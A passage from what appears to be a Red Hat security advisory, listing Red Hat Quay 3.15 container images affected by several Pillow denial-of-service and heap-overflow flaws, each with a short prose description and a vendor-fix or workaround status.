| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library's font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library's image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit a vulnerability in the library's image processing functions, specifically when handling image coordinates near certain limits. This flaw, a native heap out-of-bounds write, could lead to a denial of service (DoS), making the affected system or application unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit a vulnerability in the PdfParser.PdfStream.decode() function when processing a crafted FlateDecode PDF stream. By providing a specially designed PDF file, the attacker could cause the application to exhaust available memory, leading to a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
